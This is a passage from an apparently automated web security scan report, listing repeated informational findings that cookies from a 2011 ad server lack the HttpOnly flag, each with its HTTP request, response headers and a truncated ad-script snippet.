document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1834529841/Middle
...[SNIP]...

14.359. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593404407@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593404407@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593404407@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4509
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/282345760/Middle/
...[SNIP]...

14.360. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593605280@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593605280@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593605280@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4534
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/748549693/Middle/
...[SNIP]...

14.361. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1595740909@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1595740909@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1595740909@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1004567232/Middle
...[SNIP]...

14.362. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1616048263@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1616048263@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1616048263@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4501
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1557770911/Middle
...[SNIP]...

14.363. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1618634905@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1618634905@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1618634905@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4554
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1560517319/Middle
...[SNIP]...

14.364. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1621737551@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1621737551@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1621737551@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1023533412/Middle
...[SNIP]...

14.365. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1676341961@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1676341961@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1676341961@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4572
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/154303626/Middle/
...[SNIP]...

14.366. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAX=rcHW800+NmAABp5o; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.367. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1689149420@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1689149420@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1689149420@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4511
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/108361261/Middle/
...[SNIP]...

14.368. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1692074952@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1692074952@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1692074952@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4572
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2114966338/Middle
...[SNIP]...

14.369. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1701891140@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1701891140@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1701891140@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4573
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1171614213/Middle
...[SNIP]...

14.370. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1730151269@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1730151269@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1730151269@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4326
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1627003568/Middle
...[SNIP]...

14.371. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1739497285@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1739497285@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1739497285@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4860
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238822780/Middle/
...[SNIP]...

14.372. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1745603517@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1745603517@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1745603517@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4565
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/534073732/Middle/
...[SNIP]...

14.373. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1747984898@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1747984898@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1747984898@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:00:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/11037586/Middle/D
...[SNIP]...

14.374. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1753370563@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1753370563@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1753370563@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:03 GMT
